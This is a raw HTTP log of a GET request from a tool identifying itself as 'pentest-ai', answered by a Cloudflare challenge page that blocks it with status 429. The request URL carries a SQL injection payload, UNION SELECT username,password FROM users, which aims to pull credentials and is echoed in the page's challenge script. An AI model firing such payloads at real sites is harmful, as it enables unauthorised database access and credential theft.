REQUEST:
GET https://my.myfirst.tech/search?id=%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9429
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8473d0eeea110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=hW1MmFMqe2uf%2Bwj3ZfUzF%2FgL0V2zSxKUpnJbpl%2BgtOf7TKj75l2L6qIeG8qEMhQGbX6RLayPoH1iIFVnzPOvIGz4y43VbQDFnbYzBXxmexLej3m52GX9014vPvSq0fyGKuBiPnoM8e%2FRAPYo3w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8473d0eeea110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'TVf3LNTxR34pHshvVT_ORjXpSzjOAsZwehCQmfu4A0Q-1784281154-1.2.1.1-mmOEXJbT0e7MQ6gTfiL7n9wjQw7qqYRTUwfqSdkm65xviRb0aonwqw_pmnQZ84fi',cITimeS: '1784281154',cRay: 'a1c8473d0eeea110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?id=%27+UNION+SELECT+username%2Cpassword+FROM+users--\u0026__cf_chl_tk=.lqTtkzdhUsYOymN7jhpg8PGHM.hKBEd.gjg7sBOHaQ-1784281154-1.0.1.1-cNOiRvlpNaYhoQ2kcB87Zp1IPkFkmhAdnI_Gbw5hy3w",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?id=%27+UNION+SELECT+username%2Cpassword+FROM+users--\u0026__cf_chl_f_tk=.lqTtkzdhUsYOymN7jhpg8PGHM.hKBEd.gjg7sBOHaQ-1784281154-1.0.1.1-cNOiRvlpNaYhoQ2kcB87Zp1IPkFkmhAdnI_Gbw5hy3w",md: 'wxa3G358fIVfG8fZbbOFibUxUZqln5GO4AYPMEViC7U-1784281154-1.2.1.1-8FNejJLfCGZdpPCB.ycDW8MWSqe1dHozNjvnPSIMHzx9P.Yx8SWlkerYTD1kdt8Z.Yvls_cD5q9nwZqjWO8Dob67.yUcHxtAvw7vANKxi6DUn06Mw3H4LlUx.pmzYbDbg7rYRXwkrLPeC0dqy0fjkbSxYDQqex_Umfo8dXb.ti._zwUHAagCDjzJv65f15bqc8JMURTQVbqWovMWVL1dBMl9YzlKW95ckqBpRHwVGZ_yfk1g0d1XP2snDo9M9VWpeyBkQOPR5tU3ocGIOMBxqZxQ17Z8stV2fwKnRcNn0z8IjEQs2icbd7k15.ItRuC_V98i1_9u1Q6iKbDNDSp6aL1E12NkXKjxguYKTPZF5k6_w7QYPPEzgEbd.QXGQ7L717ux2PwaG4G9_T3ZLeTRV80VFUmgELOEYL618oRc0ex_4bujYqIkoJBK68r78PF.L8Lel3XfPct65tM8idhKpyjorhXdS0oO.C0gVuBpAMk4a0tyRxQic5M2XbPdXnYTyYFlil0MuptcJ7i.reMe9rJk8CXaLHrK4jM8FG.N11d0ZOrlj9v3Bg7J1AH.5sbK4mJ4T6fstq8y2nxJdKna7FgkqOERfdanKs6mnQjXoku8_NSyNsFClP2gQL63HLmDZ0k9IlTDaOK6jTTAdChPH_XH8sTMluO249jSE09.vj1vuSBiqS55rxRJY9QNs_eF3WujbqF2AHWsvRUOt6OF_gAGr0YDcxfCDJtCMayBxmtl1l07rG8AHhasGdWlOd_MOdaaWxckVmnKs73it07wDixgxdNFXH825mamWbBs5OkqAr2dWI2_hXNJnX_0HBFWxAdX8atLdKiZNqVKRjMgSIJa.YHVLiCN5NX4UEcPAz1IwRZ7JpvJWy6EHC0WkvMxRMq7y8kcNwlEgo5Rck1Lty6iWbQ4JRtdKYPj1QhoT2rb8yPfmHYH_4oJsjyCs.DolsX1WPXa0unK6GuxWdjUdCRX6cEbMbyBm1wvDidPUqEOLhMkIR1wLddz7w8DffIm84wENzbQ6vKFY5O2MWTI1LwhKjsJ_6herG7Q63QtuICelrXTB4PvtfyWS3eQgZQVS.IGVc.W0seKzyBYdosmR1n32M1vTF1xm0YhQ5mVTArjIzJYhsFwYJ4llEoZU5ivGosfMD5KpeCn2MlCb8QQbgh191JMvFn0sT0H0o5N2gDwao1w0c.pmRdRmyvt7nvakfptL6rMt5CPQsG9L46RtA',mdrd: 'toGAtbeRPaLgq0OOiduj9oHIO0.BP2PXcLQcH8Yitzc-1784281154-1.2.1.1-vYy_jJZ.zi7yE31ZA_I6k4_IwvyQ9pGAUcPVV7Dcx3wf6E2B.6qx6zxxfqpL4xRzc1kxxVgAGuIQ_CSSv8_Z3qfLp5bnIpb5iH.AnDsko_U4HdDaX_jEE0qDf0r0f4tRI2HvFhheTieX9PoTd.J0hojmxJUKKl5sM7nZ9gsD6h7X.Vr9imGHbj7rVeIJVP062_DXL3a6h5O63hI4dO4wEDduvHjIMgtgKeCsTAtPWJXFXX8z1ESW1gT59tU0eXJT',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8473d0eeea110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?id=%27+UNION+SELECT+username%2Cpassword+FROM+users--\u0026__cf_chl_rt_tk=.lqTtkzdhUsYOymN7jhpg8PGHM.hKBEd.gjg7sBOHaQ-1784281154-1.0.1.1-cNOiRvlpNaYhoQ2kcB87Zp1IPkFkmhAdnI_Gbw5hy3w"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
